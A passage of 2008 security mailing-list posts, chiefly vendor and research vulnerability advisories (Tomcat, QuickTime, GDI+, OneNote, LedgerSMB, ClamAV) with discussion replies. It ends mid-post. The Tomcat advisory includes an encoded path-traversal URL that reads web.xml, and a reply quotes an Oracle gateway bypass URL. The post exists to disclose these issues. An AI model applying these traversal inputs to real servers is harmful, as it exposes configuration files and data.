[SECURITY] CVE-2008-2938 - Apache Tomcat information disclosure vulnerability - Updated

[Mark Thomas]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

CVE-2008-2938: Apache Tomcat information disclosure vulnerability - Updated

Severity: Important (was moderate)

Vendor:
The Apache Software Foundation

Versions Affected:
Tomcat 4.1.0 to 4.1.37
Tomcat 5.5.0 to 5.5.26
Tomcat 6.0.0 to 6.0.16
The unsupported Tomcat 3.x, 4.0.x and 5.0.x versions may be also affected

Description (new information):
Further investigation of CVE-2008-2938 has shown that the vulnerability
also exists only with URIEncoding="UTF-8" set on the connector. In these
configurations arbitrary files in the docBase for an application,
including files such as web.xml, may be disclosed.
Users should also be aware that this vulnerability will apply when
processing requests with UTF-8 body encoding and
useBodyEncodingForURI="true"

Mitigation:
6.0.x users should upgrade to 6.0.18
5.5.x users should upgrade to 5.5.27
4.1.x users should obtain the latest source from svn or apply this patch:
http://svn.apache.org/viewvc?view=rev&revision=681065

Example:
http://www.target.com/contextpath/%c0%ae%c0%ae/WEB-INF/web.xml

Credit:
This additional information was discovered by the Apache Tomcat security
team.

References:
http://tomcat.apache.org/security.html

Mark Thomas


-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.8 (Darwin)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org

iEYEARECAAYFAkjHnCMACgkQb7IeiTPGAkMoLQCg2PxS09CpZGI9t+QcdifSfMh8
CHcAoOSRAPOzAFH5hx1w8jxOBthrAKEJ
=Fi0E
-END PGP SIGNATURE-

DeepSec 2008 - Conference Schedule

[DeepSec Conference Vienna]

The DeepSec In Depth Security Conference is happy to announce the preliminary
schedule for this year's event from November 11th to 14th in Vienna, Austria.

The schedule which can be found at https://depsec.net/schedule offers bleeding
edge talks from international speakers on topics including botnet analysis, web
application security, malware detection, legal and administrative issues, secure
coding and code review, hardware an firmware attacks, and more.

Registration is open at: https://deepsec.net/register/

In addition to the two day conference we offer two days of in-depth workshops on
selected topics:

‣ Improving Code with Destructive Data (Heikki Kortti and Jukka Taimisto)
‣ Security Audit and Hardening of Java based Software (Marc Schoenefeld)
‣ The Exploit Laboratory (Saumil Udayan Shah)
‣ Design and Implementation of Security Awareness Campaigns (Stefan Schumacher)
‣ Advanced Malware Deobfuscation (Scott Lambert)
‣ Protocol and Traffic Analysis for Snort Signature (Matt Jonkman)
‣ Secure Application Coding for Enterprise Software (Vimal Patel)

List of speakers with presentations:

‣ Achim Reckeweg ; Sun Microsystems ; Germany
‣ Alex Stamos ; iSEC Partners ; USA
‣ Alexander Kornbrust ; Red Database Security GmbH ; Germany
‣ Andrea Monti ; Studio Legale Monti ; Italy
‣ Arrigo Triulzi ; Independent Security Consultant ; Italy
‣ Chema Alonso, José Parada ; Informática 64 ; Spain
‣ Daniel Mende, Simon Rich ; ERNW GmbH ; Germany
‣ Dr. Anton Chuvakin ; LogLogic, Inc ; USA
‣ Haroon Meer ; SensePost ; South Africa
‣ Heikki Kortti and Jukka Taimisto ; Codenomicon Ltd ; Finland
‣ Jason Steer ; IronPort, a division of Cisco Systems ; UK
‣ Joe Stewart ; SecureWorks ; USA
‣ José Nazario ; Arbor Networks ; USA
‣ Kurt Grutzmacher ; Pacific Gas & Electric ; USA
‣ Luciano Bello ; CITEFA/Si6 , Debian Project ; Argentina
‣ Marc Schoenefeld ; University of Bamberg ; Germany
‣ Matt Jonkman ; Emerging Threats.net (formerly bleedingthreats.net) ; USA
‣ Morgan Marquis-Boire ; Security-Assessment.com ; New Zealand
‣ Neelay S. Shah ; Foundstone Inc., A Division of McAfee ; USA
‣ Paolo Perego ; Spike Reply srl, Owasp Orizon Project leader ; Italy
‣ Peter Panholzer ; SEC Consult Unternehmensberatung GmbH ; Austria
‣ Rafael Dominguez Vega ; MWR InfoSecurity ; UK
‣ Saumil Udayan Shah ; CEO, Net-Square ; India
‣ Scott Lambert, Jason Geffner ; Microsoft, NGSSoftware Ltd. ; USA
‣ Sharon Conheady ; Ernst & Young ; UK
‣ Shreeraj Shah ; Blueinfy Solutions ; India
‣ Simon Roses Femerling ; Microsoft ; Spain
‣ Stefan Schumacher ; Kaishakunin.com ; Germany
‣ Stefano Zanero ; Politecnico di Milano TU
‣ Claudio Criscione ; SecureNetwork Srl ; Italy
‣ VimalPatel ; Founder & Director, Blueinfy Solutions Pvt. Ltd. ; India
‣ Vincenzo Iozzo ; Secure Network ; Italy
‣ Yarochkin Fedor/Meder Kydyraliev ; guard-info ; Kyrgyzstan
‣ Yiannis Pavlosoglou ; Ounce Labs / PhD, OWASP Project Leader ; United Kingdom
‣ fukami ; SektionEins GmbH ; Germany


DeepSec Organisation Team.
https://deepsec.net/contact

Re: SQL Smuggling

[Marco Ivaldi]

Avi,

On Tue, 9 Sep 2008, [EMAIL PROTECTED] wrote:

[snip]

Of course, I'm looking forward to hearing about other instances of 
this...


Interesting reasearch.

It looks like Oracle DBMS may be vulnerable to the "Unicode Smuggling" 
attack exploiting homoglyphic translation. As outlined by David Litchfield 
in an old full-disclosure post [1]:


"It didn't take long to discover that this patch could be bypassed using 
the following techinque: due to internationalization, an Oracle database 
server will convert the ? character (value 0xFF) to a capital Y. The PLSQL 
Gateway will not. Thus, if we request:


http://www.example.com/pls/dad/S%FFS.PACKAGE.PROCEDURE

the gateway will happily pass it over to the database server where the ? 
is conveted to a Y and we can gain access again".


Cheers,

[1]. See http://seclists.org/fulldisclosure/2006/Feb/0011.html

--
Marco Ivaldi, OPST
Red Team Coordinator  Data Security Division
@ Mediaservice.net Srlhttp://mediaservice.net/

RE: Sun M-class hardware denial of service

[Michael Wojcik]

> From: Theo de Raadt [mailto:[EMAIL PROTECTED] 
> Sent: Tuesday, 09 September, 2008 17:28
> To: B 650
> Cc: bugtraq@securityfocus.com
> 
> > I apologise if I'm misunderstanding you, but it seems to me that
this 
> > issue can only be initiated by a privileged user on a domain.
> 
> If one domain can be broken into, and a Solaris kernel module 
> is loaded which then crashes that one domain, the entire 
> machine eventually has to be powered off to recover that one domain.

I agree with Theo. This is a privilege-escalation DOS attack, pure and
simple. A user with sufficient privilege in one domain, but not
necessarily in others, can 1) force that domain down for an extended
time, and/or 2) force all domains down.

"Privilege" isn't an absolute; there are degrees of privilege, and this
bug lets a user do more damage than their degree of privilege should
allow.

-- 
Michael Wojcik
Principal Software Systems Developer, Micro Focus

Re: Chrome(0.2.149.27) title(not the tag) Denial of Service(Freeze) exploit

[Julien Stuby]

Razi Shaban a écrit :

I can confirm that the PoC _does_ crash Chrome 0.2.149.29 Build 1798
running on XP SP2.

Perhaps it's the build?

--
Razi


I can confirm that the PoC _doesn't_ crash Chrome 0.2.149.29 Build 1798 
on XP SP3


--
Julien

Re: Sun M-class hardware denial of service

[Micheal Patterson]

- Original Message - 
From: "Theo de Raadt" <[EMAIL PROTECTED]>

To: "B 650" <[EMAIL PROTECTED]>
Cc: 
Sent: Tuesday, September 09, 2008 4:27 PM
Subject: Re: Sun M-class hardware denial of service






You stated in your original message that this is a high-end frame, of
the kind generally used by financial institutions etc.  I would
imagine any system which warrants this kind of hardware would have
some level of redundancy or DR.


Oh great!  Sun is off the hook for selling something which doesn't
work, and their customers must mitigate against it themselves.
Utterly ridiculous.


B 650, the major problem with that statement, is that most facilities 
that have built up redundancy for such an issue have 100% or more backup 
of the exact same gear. That means that their DR plan is still crippled 
and subject to the exact same failure as the primary system. That isn't 
an effective DR plan.


If the system were in place at say a nuclear power plant, and it was 
sold as a method to have separation to eliminate any problems with one 
system causing another to cascade crash, and this happens, that effects 
many other systems. Regardless if the initiator of the failure is a 
power user or not, the result is a total cascade failure and will result 
in a full system shutdown shutdown to recover from. It's still, by 
definition, a DOS. Simply because the actions of one individual, either 
by accident or malice, results in the denial of access to a system or 
group of systems.
If you're one of the domains that will be effected, and you're taken 
down even though your network / system is stable and working properly, 
that would be seen as an unnecessary outage. What happens if the system 
doesn't boot back up properly after the power down? Now, the outage is 
extended and perhaps critical systems are no longer available. I used a 
nuclear power plant as an example, what if it were an airport, or a 
city's 911 / Emergency service? Fire Department dispatch system? EMS 
system? Do you still think that it's a non issue to take down an entire 
system for one faulty domain?


--

Micheal Patterson
Senior Communications Systems Engineer
Rural Hospital Acquisition, LLC
405-917-0600

Confidentiality Notice:  This e-mail message, including any attachments,
is for the sole use of the intended recipient(s) and may contain
confidential and privileged information. Any unauthorized review, use,
disclosure or distribution is prohibited. If you are not the intended
recipient, please contact the sender by reply e-mail and destroy all
copies of the original message. 

ZDI-08-061: Apple QuickTime Player H.264 Parsing Heap Corruption Vulnerability

[zdi-disclosures]

ZDI-08-061: Apple QuickTime Player H.264 Parsing Heap Corruption 
Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-08-061
September 9, 2008

-- CVE ID:
CVE-2008-3627

-- Affected Vendors:
Apple

-- Affected Products:
Apple Quicktime

-- Vulnerability Details:
This vulnerability allows remote attackers to execute arbitrary code on
vulnerable installations of Apple QuickTime. User interaction is
required to exploit this vulnerability in that the target must visit a
malicious page or open a malicious file.

The specific flaw exists in the parsing of MP4 video files in
QuickTimeH264.qtx. A maliciously crafted MDAT atom can cause a heap
corruption resulting in the execution of arbitrary code. 

-- Vendor Response:
Apple has issued an update to correct this vulnerability. More
details can be found at:

http://support.apple.com/kb/HT3027

-- Disclosure Timeline:
2008-05-13 - Vulnerability reported to vendor
2008-09-09 - Coordinated public release of advisory

-- Credit:
This vulnerability was discovered by:
* Anonymous

-- About the Zero Day Initiative (ZDI):
Established by TippingPoint, The Zero Day Initiative (ZDI) represents 
a best-of-breed model for rewarding security researchers for responsibly
disclosing discovered vulnerabilities.

Researchers interested in getting paid for their security research
through the ZDI can find more information and sign-up at:

http://www.zerodayinitiative.com

The ZDI is unique in how the acquired vulnerability information is
used. TippingPoint does not re-sell the vulnerability details or any
exploit code. Instead, upon notifying the affected product vendor,
TippingPoint provides its customers with zero day protection through
its intrusion prevention technology. Explicit details regarding the
specifics of the vulnerability are not exposed to any parties until
an official vendor patch is publicly available. Furthermore, with the
altruistic aim of helping to secure a broader user base, TippingPoint
provides this vulnerability information confidentially to security
vendors (including competitors) who have a vulnerability protection or
mitigation product.

Our vulnerability disclosure policy is available online at:

http://www.zerodayinitiative.com/advisories/disclosure_policy/

CONFIDENTIALITY NOTICE: This e-mail message, including any attachments,
is being sent by 3Com for the sole use of the intended recipient(s) and
may contain confidential, proprietary and/or privileged information.
Any unauthorized review, use, disclosure and/or distribution by any 
recipient is prohibited.  If you are not the intended recipient, please
delete and/or destroy all copies of this message regardless of form and
any included attachments and notify 3Com immediately by contacting the
sender via reply e-mail or forwarding to 3Com at [EMAIL PROTECTED] 

ZDI-08-062: Apple QuickTime MDAT Frame Parsing Memory Corruption Vulnerability

[zdi-disclosures]

ZDI-08-062: Apple QuickTime MDAT Frame Parsing Memory Corruption 
Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-08-062
September 9, 2008

-- CVE ID:
CVE-2008-3627

-- Affected Vendors:
Apple

-- Affected Products:
Apple Quicktime

-- Vulnerability Details:
This vulnerability allows remote attackers to execute arbitrary code on
vulnerable installations of Apple QuickTime. User interaction is
required to exploit this vulnerability in that the target must visit a
malicious page or open a malicious file.

The specific flaw exists in the parsing of mov video files in
QuickTimeH264.scalar. A maliciously crafted MDAT atom can cause a heap
corruption resulting in the execution of arbitrary code under the
context of the current user.

-- Vendor Response:
Apple has issued an update to correct this vulnerability. More
details can be found at:

http://support.apple.com/kb/HT3027

-- Disclosure Timeline:
2008-05-19 - Vulnerability reported to vendor
2008-09-09 - Coordinated public release of advisory

-- Credit:
This vulnerability was discovered by:
* Subreption LLC

-- About the Zero Day Initiative (ZDI):
Established by TippingPoint, The Zero Day Initiative (ZDI) represents 
a best-of-breed model for rewarding security researchers for responsibly
disclosing discovered vulnerabilities.

Researchers interested in getting paid for their security research
through the ZDI can find more information and sign-up at:

http://www.zerodayinitiative.com

The ZDI is unique in how the acquired vulnerability information is
used. TippingPoint does not re-sell the vulnerability details or any
exploit code. Instead, upon notifying the affected product vendor,
TippingPoint provides its customers with zero day protection through
its intrusion prevention technology. Explicit details regarding the
specifics of the vulnerability are not exposed to any parties until
an official vendor patch is publicly available. Furthermore, with the
altruistic aim of helping to secure a broader user base, TippingPoint
provides this vulnerability information confidentially to security
vendors (including competitors) who have a vulnerability protection or
mitigation product.

Our vulnerability disclosure policy is available online at:

http://www.zerodayinitiative.com/advisories/disclosure_policy/

CONFIDENTIALITY NOTICE: This e-mail message, including any attachments,
is being sent by 3Com for the sole use of the intended recipient(s) and
may contain confidential, proprietary and/or privileged information.
Any unauthorized review, use, disclosure and/or distribution by any 
recipient is prohibited.  If you are not the intended recipient, please
delete and/or destroy all copies of this message regardless of form and
any included attachments and notify 3Com immediately by contacting the
sender via reply e-mail or forwarding to 3Com at [EMAIL PROTECTED] 

Re: Sun M-class hardware denial of service

[Bob Beck]

> 
> Yet you don't know what it is that causes the issue?  What's Sun's
> support arrangement for OpenBSD on SPARC?  If it is reproduced in
> Solaris, then I'm sure Sun would address it, but where is the benefit
> for them to do so at present?

It's not about OpenBSD on sparc - the OpenBSD people don't
really care - the fact that it's possible at all means anyone with
clue and a less than black hat can go take an OpenBSD kernel, figure
out what it's doing there, and likely make a solaris kernel module
to do the same thing - then they have a nice little tool. This indicates
that something is broken, and can likely be taken advantage of.

Frankly, the OpenBSD people aren't going to bother doing it.
They're only interested in making OpenBSD go. I can think of several
people I've met in bars on the other hand who might be interested
in having a domain-instabrick module for solaris.

-Bob

Insomnia : ISVA-080910.1 - MS Office OneNote URL Handling Vulnerability

[Brett Moore]

__

 Insomnia Security Vulnerability Advisory: ISVA-080910.1
___

 Name: MS Office OneNote URL Handling Vulnerability
 Released: 10 September 2008
  
 Vendor Link: 
http://http://office.microsoft.com/onenote
  
 Affected Products:
MS Office Onenote 2007
MS Office 2003 and 2007 have vulnerable components
 
 Original Advisory: 
http://www.insomniasec.com/advisories/ISVA-080910.1.htm
 
 Researcher: 
Brett Moore, Insomnia Security
http://www.insomniasec.com
___

___

 Description
___

OneNote is included as part of office 2007, and provides an easy
way to store, manage, and share information.

OneNote installs a URL Handler under the registry key 
  HKEY_CLASSES_ROOT\OneNote 

with an open command specified as 
  C:\PROGRA~1\MICROS~2\Office12\ONENOTE.EXE /hyperlink "%1"
  
Due to the URL Handler, OneNote can be started from Internet
Explorer through a URI reference of 
  onenote://onenotefile 

Where onenotefile is a locally hosted file, or a file accessible
through a UNC/WebDav share.

The instance of onenote started will executed through the 
IEUSER.EXE process running under the currently logged in user.
 
OneNote is one of the few Microsoft installed applications that
does NOT PROMPT the user, before executing from the URL.

Through the use of command line switches passed to OneNote from 
a URL, we found two exploitation scenarios.

___

 Details
___

- File Transfer to Client -

OneNote accepts a command switch to specify the location of the
local cache directory. By specifying this switch on the URL It is
possible to specify an arbitrary location on the client, which
will be used to cache the opened notebooks. 

If a notebook is loaded from a remote share, a local copy will be
created under the cache directory. When OneNote caches the notebook
it makes a local copy of any binary files that are embedded inside
the notebook.

This allows the placement of binary files in a 'semi arbitrary'
location that can then be used in conjunction with social engineering
emails, or other attacks that require the knowledge of the location
of a file.

There may also be other attack vectors through the placement of
specially named files within search paths.

- Theft of Users OneNote Notebooks -

OneNote accepts a command switch to specify the location of the
backup directory. 

It is possible to specify a SMB share location on a remote server,
which will be used to backup the notebooks. This results in copies
of all opened notebooks been sent to the remote share.

___

 Solution
___

Microsoft have released a security update to address this issue;
http://www.microsoft.com/technet/security/bulletin/ms08-055.mspx

___

 Legals
___

The information is provided for research and educational purposes
only. Insomnia Security accepts no liability in any form whatsoever
for any direct or indirect damages associated with the use of this
information.

___
 
Insomnia Security Vulnerability Advisory: ISVA-080910.1
___

Re: SQL Smuggling

[Tim]

> We released a research paper a few months ago, regarding a sub-class
> of SQL Injection that has not received attention till now. The crux is
> that when it comes to SQLi, protection and detection do not typically
> take the architecture into account; this can allow smuggling attacks
> which are not blocked or discovered.
> 
> The paper can be found at:
> http://www.ComsecGlobal.com/framework/Upload/SQL_Smuggling.pdf 
> 
> From the paper:
> "This paper will present a new class of attack, called SQL Smuggling.
> ...


I don't see how this is a new class of attack.  You've merely outlined
some techniques to bypass broken data validation routines.  In SQL
injection, as with any injection vulnerability, the correct way to fix
it is to rely on the syntax of the language to encode data which may be
interpreted as /special/.  

Yes, this is database specific.  That's not new.  That's why you need to
rely on the database's routines for treating data as data and not as SQL
syntax.  This is what parameterized statements are for.  You rely on the
database driver or database server itself to correctly separate data
from syntax.  If this is still injectable, then it's a vulnerability in
that particular database, but still isn't a "new class of attack".

Relying on data validation alone will eventually land you in hot water.
You can't always reject last names such as "O'Leary" just because of the
apostrophe.  Correct encoding is the way to *fix* it, and data
validation should only be used to slow down the bad guy if you forgot to
encode something and to enforce business logic.  (Go back and read this
paragraph again.  It's the important one.)

As for attacks against signature validation... uh, don't even go there.
We all know that's a losing battle.  Just look at how bad AV has become.

In summary, your paper would be better presented as a collection of fun
SQL injection attacks against commonly broken data validation routines.

tim

iDefense Security Advisory 09.09.08: Apple QuickTime PICT Integer Overflow Vulnerability

[iDefense Labs]

iDefense Security Advisory 09.09.08
http://labs.idefense.com/intelligence/vulnerabilities/
Sep 09, 2008

I. BACKGROUND

Quicktime is Apple's media player product, and is used to render video
and other media. The PICT file format was developed by Apple Inc. in
1984. PICT files can contain both object oriented images and bitmaps.
For more information visit the vendor's web site at the following URL.

http://www.apple.com/quicktime/

II. DESCRIPTION

Remote exploitation of an integer overflow in Apple Inc.'s QuickTime
could allow an attacker to execute arbitrary code in the security
context of the current user.

QuickTime is vulnerable to an integer overflow vulnerability when
handling malformed PICT files. This issue results in heap corruption
which can lead to arbitrary code execution.

III. ANALYSIS

Exploitation of this issue results in arbitrary code execution in the
security context of the current user. An attacker would need to host a
web page containing a malformed PICT file. Upon visiting the malicious
web page exploitation would occur. Alternatively a malicious PICT file
could be attached to an e-mail.

IV. DETECTION

Apple Inc.'s QuickTime versions 7.4.5 and 7.4 have been confirmed to be
vulnerable to this issue. Older versions are also suspected to be
vulnerable.

V. WORKAROUND

iDefense recommends disabling the QuickTime Plug-in and altering the
.pic and .pict file type associations within the registry. Disabling
the plug-in will prevent web browsers from utilizing QuickTime Player
to view associated media files. Removing the file type associations
within the registry will prevent QuickTime Player and Picture Viewer
from opening .pic and .pict files.

VI. VENDOR RESPONSE

Apple has released QuickTime 7.5.5 which resolves this issue. More
information is available via Apple's QuickTime Security Update page at
the URL shown below.

http://support.apple.com/kb/HT3027

VII. CVE INFORMATION

The Common Vulnerabilities and Exposures (CVE) project has assigned the
name CVE-2008-3614 to this issue. This is a candidate for inclusion in
the CVE list (http://cve.mitre.org/), which standardizes names for
security problems.

VIII. DISCLOSURE TIMELINE

05/13/2008  Initial vendor notification
05/22/2008  Initial vendor response
09/09/2008  Coordinated public disclosure

IX. CREDIT

The discoverer of this vulnerability wishes to remain anonymous.

Get paid for vulnerability research
http://labs.idefense.com/methodology/vulnerability/vcp.php

Free tools, research and upcoming events
http://labs.idefense.com/

X. LEGAL NOTICES

Copyright © 2008 iDefense, Inc.

Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without the express
written consent of iDefense. If you wish to reprint the whole or any
part of this alert in any other medium other than electronically,
please e-mail [EMAIL PROTECTED] for permission.

Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS condition.
 There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct,
indirect, or consequential loss or damage arising from use of, or
reliance on, this information.

Multiple Vulnerabilities: LedgerSMB < 1.2.15

[Chris Travers]

Multiple vulnerabilities:  LedgerSMB

Synopsis:  Two vulnerabilities announced in LedgerSMB for versions
prior to 1.2.15
Status:  Corrected in version 1.2.15 and later (vendor fix available).
Impact:  Resource exhaustion on server, arbitrary SQL command execution.
Other software affected:  SQL-Ledger, all versions, and likely related software

Two vulnerabilities have been recently discovered in LedgerSMB which
have been patched in version 1.2.15 and later.

Vulnerability 1:  Resource exhaustion
Problem:  The CGI scripts read the query string up to
$ENV{CONTENT_LENGTH}, allowing for unlimited data in POST operations
to any screen.  Authentication is not required and this can be used to
deny service not only to LedgerSMB but potentially to anything else
running on the server.  This was corrected in 1.2.15.

Credit for discovery:
Chris Murtagh

Vulnerability 2:  SQL Injection in AR/AP Transactions Report
A parameter was not properly validated prior to being included in the
SQL for generating this report.  It would have been possible to inject
arbitrary SQL into the query.  Authentication is required to exploit. This
was corrected in 1.2.15.

Credit for discovery:
Seneca Cunningham

[ MDVSA-2008:189 ] clamav

[security]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

 ___

 Mandriva Linux Security Advisory MDVSA-2008:189
 http://www.mandriva.com/security/
 ___

 Package : clamav
 Date: September 9, 2008
 Affected: 2007.1, 2008.0, 2008.1, Corporate 3.0, Corporate 4.0
 ___

 Problem Description:

 Multiple vulnerabilities were discovered in ClamAV and corrected with
 the 0.94 release, including:
 
 A vulnerability in ClamAV's chm-parser allowed remote attackers to
 cause a denial of service (application crash) via a malformed CHM file
 (CVE-2008-1389).
 
 A vulnerability in libclamav would allow attackers to cause a
 denial of service via vectors related to an out-of-memory condition
 (CVE-2008-3912).
 
 Multiple memory leaks were found in ClamAV that could possibly allow
 attackers to cause a denial of service via excessive memory consumption
 (CVE-2008-3913).
 
 A number of unspecified vulnerabilities in ClamAV were reported that
 have an unknown impact and attack vectors related to file descriptor
 leaks (CVE-2008-3914).
 
 Other bugs have also been corrected in 0.94 which is being provided
 with this update.  Because this new version has increased the major
 of the libclamav library, updated dependent packages are also being
 provided.
 ___

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1389
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3912
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3913
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3914
 ___

 Updated Packages:

 Mandriva Linux 2007.1:
 5a59d6fe5e4fc3dfeffa930bf1bfbade  2007.1/i586/clamav-0.94-1.1mdv2007.1.i586.rpm
 6699ae8d7a278a4546bd16b8edd92b80  
2007.1/i586/clamav-db-0.94-1.1mdv2007.1.i586.rpm
 369affe714278781d07748aa9aa3282d  
2007.1/i586/clamav-milter-0.94-1.1mdv2007.1.i586.rpm
 a34884b3416c7039bfe0307329a75469  2007.1/i586/clamd-0.94-1.1mdv2007.1.i586.rpm
 326099a42cc04963de5a4e6c32d9295e  2007.1/i586/klamav-0.44-1.1mdv2007.1.i586.rpm
 3dac3a08b8077d6367ca22bf9b8b5731  
2007.1/i586/libclamav5-0.94-1.1mdv2007.1.i586.rpm
 329b46ef055ea610b9baa0a364cce0b0  
2007.1/i586/libclamav-devel-0.94-1.1mdv2007.1.i586.rpm 
 685aea74c200241fdf8ef9fc6f4e4e7b  2007.1/SRPMS/clamav-0.94-1.1mdv2007.1.src.rpm
 25b939eb3abfe70374edf4f314f7d2bc  2007.1/SRPMS/klamav-0.44-1.1mdv2007.1.src.rpm

 Mandriva Linux 2007.1/X86_64:
 19b119eeae8187c820a56681ec003bd2  
2007.1/x86_64/clamav-0.94-1.1mdv2007.1.x86_64.rpm
 44f1c6f2729a154a4d5b92b9b0185b37  
2007.1/x86_64/clamav-db-0.94-1.1mdv2007.1.x86_64.rpm
 c4a07f4bd14120db422b196f32c491fe  
2007.1/x86_64/clamav-milter-0.94-1.1mdv2007.1.x86_64.rpm
 4ac4af22079d824c87f83224bb0a5e0a  
2007.1/x86_64/clamd-0.94-1.1mdv2007.1.x86_64.rpm
 577fa90a30d5b2f47fbd730bf6abcd1f  
2007.1/x86_64/klamav-0.44-1.1mdv2007.1.x86_64.rpm
 7bcfa45a9c5b60eb9a1a6eac3a9e475c  
2007.1/x86_64/lib64clamav5-0.94-1.1mdv2007.1.x86_64.rpm
 f2aaa85f2e0504a380dec20f644efecc  
2007.1/x86_64/lib64clamav-devel-0.94-1.1mdv2007.1.x86_64.rpm 
 685aea74c200241fdf8ef9fc6f4e4e7b  2007.1/SRPMS/clamav-0.94-1.1mdv2007.1.src.rpm
 25b939eb3abfe70374edf4f314f7d2bc  2007.1/SRPMS/klamav-0.44-1.1mdv2007.1.src.rpm

 Mandriva Linux 2008.0:
 07c42704f9eb9c8030f801f229304b3e  2008.0/i586/clamav-0.94-1.1mdv2008.0.i586.rpm
 5103d15263284af283399e0eeb71296a  
2008.0/i586/clamav-db-0.94-1.1mdv2008.0.i586.rpm
 2cf2f1d21d5428c8a26a80d6a70e8a34  
2008.0/i586/clamav-milter-0.94-1.1mdv2008.0.i586.rpm
 fc53823cb1b73eb75c008a3ebc21193a  2008.0/i586/clamd-0.94-1.1mdv2008.0.i586.rpm
 67b1edd4b40dbc10e3594e79a9016f0e  2008.0/i586/klamav-0.44-1.1mdv2008.0.i586.rpm
 779bd44fb23ab3d7c38a0ebef3382938  
2008.0/i586/libclamav5-0.94-1.1mdv2008.0.i586.rpm
 2ec3fb577dc1da56af0481f197e2000d  
2008.0/i586/libclamav-devel-0.94-1.1mdv2008.0.i586.rpm 
 fff2dc6701ea1a7e458e0c7305d7c4b4  2008.0/SRPMS/clamav-0.94-1.1mdv2008.0.src.rpm
 790d1fafeb9d594a4ef8b0815f3262b2  2008.0/SRPMS/klamav-0.44-1.1mdv2008.0.src.rpm

 Mandriva Linux 2008.0/X86_64:
 19a38a3e0dd4b8110978001c9e00983c  
2008.0/x86_64/clamav-0.94-1.1mdv2008.0.x86_64.rpm
 7d656ec44f2bb5ff2b0fec6bafa7df70  
2008.0/x86_64/clamav-db-0.94-1.1mdv2008.0.x86_64.rpm
 836b5f5b80d43e8deccc568c4ab13d29  
2008.0/x86_64/clamav-milter-0.94-1.1mdv2008.0.x86_64.rpm
 3fcf6e4b59d7b7478f54293fcd2ee645  
2008.0/x86_64/clamd-0.94-1.1mdv2008.0.x86_64.rpm
 2ce435e797aff93eaa669bddd07c80f5  
2008.0/x86_64/klamav-0.44-1.1mdv2008.0.x86_64.rpm
 24e564b09aa2da8b990341faaaed48e7  
2008.0/x86_64/lib64clamav5-0.94-1.1mdv2008.0.x86_64.rpm
 f3aad5e06843c9b3e2d02ad200061e0e  
2008.0/x86_64/lib64clamav-devel-0.94-1.1mdv2008.0.x86_64.rpm 
 fff2dc6701ea1a7e458e0c7305d7c4b4  2008.0/SRPMS/clamav

iDefense Security Advisory 09.09.08: Microsoft Windows GDI+ Gradient Fill Heap Overflow Vulnerability

[iDefense Labs]

iDefense Security Advisory 09.09.08
http://labs.idefense.com/intelligence/vulnerabilities/
Sep 09, 2008

I. BACKGROUND

The GDI+ library, or "GdiPlus.dll", provides access to a number of
graphics methods, via a class-based API. Vector Markup Language (VML)
is a component of the Extensible Markup Language (XML) that specifies
vector images (e.g., rectangles and ovals) using the GDI+ API. For more
information about these technologies, visit the following URLs.

http://msdn.microsoft.com/en-us/library/ms533797(VS.85).aspx
http://msdn.microsoft.com/en-us/library/ms533798(VS.85).aspx
http://www.w3.org/TR/1998/NOTE-VML-19980513
http://en.wikipedia.org/wiki/Vector_Markup_Language

II. DESCRIPTION

Remote exploitation of an integer overflow vulnerability in multiple
versions of Microsoft Corp.'s GDI+ could allow an attacker to execute
arbitrary code within the context of the local user.

The vulnerability specifically exists in the memory allocation performed
by the GDI+ library. Certain malformed gradient fill input can cause the
application to corrupt the heap, potentially allowing arbitrary code
execution.

III. ANALYSIS

Exploitation of this vulnerability may allow an attacker to execute
arbitrary code in the context of the current user. To exploit this
vulnerability, the attacker would need to convince a targeted user to
render a document with an application that utilizes the vulnerable GDI+
functions. This could be accomplished by persuading the user to follow a
link, view a document, or read an e-mail message.

IV. DETECTION

iDefense Labs confirmed this vulnerability affects Internet Explorer 7
and Internet Explorer 6 on the Microsoft Windows XP SP2 platform. The
following versions of VGX.DLL were tested and found to be vulnerable:

  7.00.6000.20628
  7.00.6000.16386
  6.00.2900.3051
  6.00.2900.2997

While the VGX.DLL library (which handles VML) appears to be the most
likely vector, Microsoft have indicated to us that the GdiPlus.dll is
the root cause of the vulnerability. Version 5.1.3102.2180 of
GdiPlus.dll was installed on each of the tested systems.

V. WORKAROUND

In order to prevent exploitation of this vulnerability, unregister or
deny access to vgx.dll and/or gdiplus.dll. Note that doing so will
prevent proper rendering of documents that rely on the affected
component.

VI. VENDOR RESPONSE

Microsoft has officially addressed this vulnerability with Security
Bulletin MS08-052. For more information, consult their bulletin at the
following URL.

http://www.microsoft.com/technet/security/bulletin/ms08-052.mspx

VII. CVE INFORMATION

The Common Vulnerabilities and Exposures (CVE) project has assigned the
name CVE-2007-5348 to this issue. This is a candidate for inclusion in
the CVE list (http://cve.mitre.org/), which standardizes names for
security problems.

VIII. DISCLOSURE TIMELINE

05/09/2007  Initial vendor notification
05/09/2007  Initial vendor response
09/09/2008  Coordinated public disclosure

IX. CREDIT

This vulnerability was discovered by Greg MacManus during his tenure
with iDefense Labs.

Get paid for vulnerability research
http://labs.idefense.com/methodology/vulnerability/vcp.php

Free tools, research and upcoming events
http://labs.idefense.com/

X. LEGAL NOTICES

Copyright © 2008 iDefense, Inc.

Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without the express
written consent of iDefense. If you wish to reprint the whole or any
part of this alert in any other medium other than electronically,
please e-mail [EMAIL PROTECTED] for permission.

Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS condition.
 There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct,
indirect, or consequential loss or damage arising from use of, or
reliance on, this information.

Windows GDI+ GIF memory corruption

[Ivan Fratric]

There is a memory corruption vulnerability with GIF file processing in
Microsoft GDI+ that can be used to crash a vulnerable application and
